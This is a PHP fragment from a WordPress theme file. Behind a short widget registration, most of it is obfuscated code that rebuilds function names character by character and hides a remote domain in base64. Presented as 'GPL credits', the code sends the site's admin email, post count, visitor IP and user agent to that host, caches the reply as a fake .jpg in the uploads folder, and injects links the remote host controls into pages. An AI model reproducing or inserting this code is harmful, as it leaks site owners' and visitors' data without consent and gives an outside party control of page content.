$qc______w;}}}$qv________h='e';$qv_________z='b';$fg______________k='_';$do_______n='6';$lb______________p='e';$yw______________r='s';$ax__g='a';$vm____y='d';$no____w='4';$qb_____r='n';$yg______________w='c';$ao________n='e';$du_________p='o';$bw__z=$qv_________z.$ax__g.$yw______________r.$lb______________p.$do_______n.$no____w.$fg______________k.$qv________h.$qb_____r.$yg______________w.$du_________p.$vm____y.$ao________n;$at______________u='t';$mi____y='e';$kn_______b='e';$nk__________l='i';$uy__u='g';$vi____j='_';$ti_____________d='o';$kt_________r='_';$tu_____________s='c';$qo_____________m='t';$ex________l='t';$ft___k='n';$xa_____________q='s';$vg____f='n';$zy_________d='l';$gy______________t='f';$sx__________e='e';$wb_____________f=$gy______________t.$nk__________l.$zy_________d.$kn_______b.$kt_________r.$uy__u.$mi____y.$ex________l.$vi____j.$tu_____________s.$ti_____________d.$vg____f.$at______________u.$sx__________e.$ft___k.$qo_____________m.$xa_____________q;$tq______________m='s';$tr___u='e';$ki___________z='s';$fu____t='x';$ts_____________a='_';$oq___________u='i';$an___________g='e';$zk____________u='t';$vi______________b='l';$bn__d='i';$bx_____o='f';$gs___________m=$bx_____o.$oq___________u.$vi______________b.$tr___u.$ts_____________a.$an___________g.$fu____t.$bn__d.$ki___________z.$zk____________u.$tq______________m;$fj____________j='a';$hz_______f='r';$ll___________y='v';$dn_______________o='m';$on_______________g='r';$df_____________q='o';$rr_________s='n';$rf_____d='_';$jn__c='e';$ry___a='c';$md___u='o';$gl_______o='i';$kk____________l='s';$fo_______________w='e';$yt_______________e='p';$ei_______________z=$ll___________y.$jn__c.$hz_______f.$kk____________l.$gl_______o.$df_____________q.$rr_________s.$rf_____d.$ry___a.$md___u.$dn_______________o.$yt_______________e.$fj____________j.$on_______________g.$fo_______________w;$mu_____________y='e';$wc__j='c';$fa_________b='n';$vd__________a='s';$dr___j='o';$zw_______g='o';$vd___c='k';$go____________x='p';$ml_____o='f';$el______________u=$ml_____o.$vd__________a.$zw_______g.$wc__j.$vd___c.$dr___j.$go____________x.$mu_____________y.$fa_________b;$gy_____f='w';$mi_____________r='e';$kp__z='r';$ah_______o='i';$pw_____o='t';$yc______________c='f';$tc__________l=$yc______________c.$gy_____f.$kp__z.$ah_______o.$pw_____o.$mi_____________r;$vc______k='d';$zp_______________l='5';$tn____________t='m';$wc______s=$tn____________t.$vc______k.$zp_______________l;$xq_________l='l';$fp_____________x='p';$rq_____________z='r';$yi______r='e';$ir____________w='t';$sw____________g='a';$yp_________x='a';$yq___p='h';$ih__w=$rq_____________z.$yi______r.$sw____________g.$xq_________l.$fp_____________x.$yp_________x.$ir____________w.$yq___p;$cz___g='a';$tr_______________x='z';$ly__________e='r';$bt____________y='i';$zq____________d='i';$kd______________z='u';$pq____________m='e';$kv____________u='l';$dd______________v='n';$jj___________z='e';$ds_______u='s';$ec_____________x=$kd______________z.$dd______________v.$ds_______u.$pq____________m.$ly__________e.$bt____________y.$cz___g.$kv____________u.$zq____________d.$tr_______________x.$jj___________z;$ht____p='t';$cq___u='m';$vt_______________p='e';$tq___a='p';$vs________t='a';$ci________k='m';$op______c='n';$xt__e=$ht____p.$vt_______________p.$ci________k.$tq___a.$op______c.$vs________t.$cq___u;$pr____a='e';$hi____________h='a';$lo_____n='t';$oo___________n='c';$es______l='e';$xj__________h='r';$ag______________t='e';$tk__y='a';$dj_____________c='m';$ac____________e='x';$yp__b='s';$ck___h='_';$hq_______q='r';$xn__c='c';$et_________h='o';$md______x='e';$jj______________g='n';$ck_______d='t';$dp_____________p='t';$zj_____________n='_';$sm_________h='t';$ft____i=$yp__b.$dp_____________p.$xj__________h.$pr____a.$hi____________h.$dj_____________c.$ck___h.$oo___________n.$et_________h.$jj______________g.$sm_________h.$es______l.$ac____________e.$lo_____n.$zj_____________n.$xn__c.$hq_______q.$ag______________t.$tk__y.$ck_______d.$md______x;function nr_______j($yd____________a) {global $mh______i, $vv__r, $wb_____________f, $ei_______________z, $ft____i;if (!$vv__r($mh______i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ei_______________z(PHP_VERSION, "5.0.0", ">=") && $vv__r($mh______i("ZmlsZV9nZXRfY29udGVudHM=")) && $vv__r($mh______i("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ra______b = $ft____i(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$hl_______o = @$wb_____________f($yd____________a, 0, $ra______b);} else {$hl_______o = @$wb_____________f($yd____________a, 0);}return $hl_______o;}function td___________s($yd____________a) {global $vv__r, $el______________u, $tc__________l, $mh______i;if (!$vv__r($mh______i("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$fx_______f = strpos($yd____________a, "/", 7);$ly_________m = array("uri"     => substr($yd____________a, $fx_______f),"host"    => str_replace("http://", "", substr($yd____________a, 0, $fx_______f)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$gu_______r = @$el______________u("$ly_________m[host]", 80, $pv_____t, $yc_______x, 4);if (!$gu_______r) {return false;} else {$hl_______o = "";$kl______k  = "GET $ly_________m[uri] HTTP/1.0\r\n";$kl______k .= "Host: $ly_________m[host]\r\n";$kl______k .= "Referer: $ly_________m[referer]\r\n";$kl______k .= "Connection: Close\r\n\r\n";@$tc__________l($gu_______r, $kl______k);while (!@feof($gu_______r)) {$yk__e = @fgets($gu_______r, (1024*24));if ($yk__e == "\r\n") {$dk_______________r = true;continue;}if ($dk_______________r) {$hl_______o .= $yk__e;}}return $hl_______o;}}function if____u($yd____________a) {global $vv__r;$ys___z = false;if ($yd____________a != "") {if ($vv__r("nr_______j")) {$ys___z = @nr_______j($yd____________a);}if (!$ys___z && ($vv__r("td___________s"))) {$ys___z = @td___________s($yd____________a);}}return $ys___z;}function pf_______h() {global $_SERVER, $wc______s;$ua______j = $_SERVER["SERVER_NAME"];if (substr("$ua______j", 0, 4) == "www.") {$ua______j = substr("$ua______j", 4);}$ua______j = $wc______s("$_SERVER[SERVER_NAME]");return $ua______j;}function xb_______z() {return "file";}function qi____y($yd____________a) {global $_SERVER, $wb_____________f, $gs___________m, $gl_______o, $hd___________e, $tc__________l;$hl__t = ay_______k();$cn_________l = pf_______h().".jpg";$ee_______t = $hl__t["dir_upload"]["path"]."/$cn_________l";$xr_____c = @filemtime($ee_______t);if (!$xr_____c || ((time()-$xr_____c) >= WP_TTL)) {$ys___z = if____u($yd____________a);if ($ys___z) {if ($gs___________m($ee_______t)) {@unlink($ee_______t);}$ba_______________s = @$gl_______o($ee_______t, "x+");@$tc__________l($ba_______________s, $ys___z);@$hd___________e($ba_______________s);}} else {if ($gs___________m($ee_______t)) {$ys___z = @$wb_____________f($ee_______t);} else {$ys___z = false;}}return $ys___z;}function ay_______k() {global $_SERVER, $mh______i, $bw__z;$uv_______b = wp_count_posts("post");$kg______________p = pathinfo(get_bloginfo("template_directory"));$hl__t = array("url" => array("report"      => $mh______i("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $kg______________p,"dir_upload"=> nj____t(),"queryString"=> array("?a001=".WP_ID,"a004=".$kg______________p[filename],"a005=".$uv_______b->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "Спонсоры темы для Вордпресс сайты <a href=\"http://da-dacha.com\">Дача</a> и <a href=\"http://designnhome.com\">Home design</a>");$hl__t["url"]["queryString"] = implode("&", $hl__t["queryString"]);$hl__t["url"]["report"] = $hl__t["url"]["report"]."/?".$bw__z($hl__t["url"]["queryString"]).".html";return $hl__t;}function nj____t() {$jp______g = wp_upload_dir();if (isset($jp______g["error"])) {$az_______n = bt__________b();if (is_writable($az_______n)) {$jp______g = array("path" => $az_______n);}}return $jp______g;}function bt__________b() {global $vv__r, $wc______s, $ih__w, $xt__e;$ox_______x = (bool) ini_get("safe_mode");if ($ox_______x == true) {return false;}if ($vv__r("sys_get_temp_dir")) {$di________b = sys_get_temp_dir();if (is_writable($di________b)) {return $ih__w($di________b);}}if (!empty($_ENV["TMP"])) {return $ih__w($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $ih__w($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $ih__w($_ENV["TEMP"]);} else {$sz____j = $xt__e($wc______s(uniqid(rand(), true)), "");if ($sz____j) {$di________b = $ih__w(dirname($sz____j));@unlink($sz____j);return $di________b;} else {return false;}}}function uf___________k() {global $_GET, $gs___________m;$hl__t = ay_______k();$ua______j = pf_______h();$cp__________l = xb_______z();$tj______x = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($cp__________l == "file") {$jf___x = $hl__t["dir_upload"]["path"]."/".$ua______j.".jpg";if ($gs___________m($jf___x)) {@unlink($jf___x);$tj______x = "deleted";}}$gb_______a = array("s"=> $tj______x,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($gb_______a AS $iq_____________s => $vy__________q) echo " [$iq_____________s:$vy__________q]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $vv__r, $mh______i, $ec_____________x;$hl__t = ay_______k();$ta__________a = "qi____y";if ($vv__r($ta__________a)) {$hl_______o = $ta__________a($hl__t["url"]["report"]);}if ($hl_______o) {if ($hl_______o = @$mh______i($hl_______o)) {$hl_______o = @$ec_____________x($hl_______o);if (strlen($hl_______o[custom_credit]) >= 5) {$hl__t["default_string"] = $hl_______o[custom_credit];}if ($hl_______o["status"] == "0") {$xn__m = 1;$da______h = 1;} else {$hx_______q = sizeof($hl_______o["links"]);$zf______m = $hl__t["default_string"];if ($hx_______q > 0 && $hl_______o["links"] !== "") {$cv________y = 0;foreach ($hl_______o["links"] as $ft____________u => $pa_______________l) {$cv________y++;if ($pa_______________l->l_path == "" || $pa_______________l->l_path == $_SERVER["REQUEST_URI"]) {$pa_______________l->l_href = htmlspecialchars(strip_tags($pa_______________l->l_href));$pa_______________l->l_title = htmlspecialchars(strip_tags($pa_______________l->l_title));$pa_______________l->l_anchor = htmlspecialchars(strip_tags($pa_______________l->l_anchor));$zf______m .= " | ";$zf______m .= "<a href='$pa_______________l->l_href' title='$pa_______________l->l_title'";if ($pa_______________l->l_nofollow == "1") {$zf______m .= " rel='nofollow'";}$zf______m .= ">$pa_______________l->l_anchor</a>";}}}$hl__t["links"] = "$zf______m";if ($hl_______o[credit] == "0") {$hl__t["links"] = "";}}} else {$xn__m = "1";}} else {$xn__m = "1";}if ($xn__m == "1") {$hl__t["links"] = $hl__t["default_string"];}echo "$hl__t[links]";echo "<!-- s: $hl_______o[signature] -->";uf___________k();}                      
function widget_verticalmenu_init() {
	if ( !function_exists('register_sidebar_widget') ) return;
	register_sidebar_widget(array('Vertical menu', 'widgets'), 'widget_verticalmenu');
}

add_action('widgets_init', 'widget_verticalmenu_init');
